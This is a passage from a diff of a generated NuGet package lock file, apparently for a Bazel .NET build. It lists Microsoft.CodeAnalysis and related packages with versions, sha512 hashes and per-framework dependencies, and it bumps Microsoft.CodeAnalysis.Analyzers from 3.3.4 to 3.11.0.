"net7.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net9.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], 
"netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.CodeAnalysis", "id": "Microsoft.CodeAnalysis", "version": "4.12.0", "sha512": "sha512-saGSG86irNb5MX0/7j0Lx2T0jSGQuqa6QlohBHBcTzObPyMunQZIuIWVXlEiKwcrcEQm4rtUg/5FW43s0dqH7Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", 
"System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", 
"System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net8.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", 
"System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net9.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", 
"System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard2.1": 
["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.CodeAnalysis.Analyzers", "id": "Microsoft.CodeAnalysis.Analyzers", "version": "3.3.4", "sha512": "sha512-I+Riw6/6WjNICydoiNpDjN/GGP7u4XsL6VsI9lG/OjFufH3flvSEy/fxNhGDVGwZWwq/5BlnqX+LH2dmheaPfg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.CodeAnalysis.Analyzers", "id": "Microsoft.CodeAnalysis.Analyzers", "version": "3.11.0", "sha512": "sha512-tP9SLzLK72XCExlh8KXfrKbU6ycmZL3ExGl/a3Ml7LNy2Uaam7gFjjUmdzyTYkMXTyckCHHpzx7bD6BMumh8Bg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": 
[], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.CodeAnalysis.Common", "id": "Microsoft.CodeAnalysis.Common", "version": "4.12.0", "sha512": "sha512-83sYPF0SekVhecApCFXsLCsQL9qFzAl5ieCEqVb8Uo08nV34YD3cfq7FLv6EkhnAwPbP7ky19sAEEqYLDUrxWA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net462": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net47": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net471": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", 
"System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net472": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net48": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net5.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net6.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net7.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Analyzers", 
"System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netstandard2.1": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.CodeAnalysis.CSharp", "id": 
"Microsoft.CodeAnalysis.CSharp", "version": "4.12.0", "sha512": "sha512-Dbb/taxFill9/+2HRJufXW3udAtJaQw3+LzbWTDyYx7Z02HVdU5ydMXXTqg5lFgSmLDNBe+B8jRuI2eYw8OBOA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.Common", 
"Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", 
"System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.CodeAnalysis.CSharp.Workspaces", "id": "Microsoft.CodeAnalysis.CSharp.Workspaces", 
"version": "4.12.0", "sha512": "sha512-YwFqDAYHJrf02FyGU8nQnaWNryZXuDV0r8pVgWjRtxAFDWfaU5CZxvU/4NsS6GSnEsWp6W/e49QMHsDXTJW/KA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", 
"Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", 
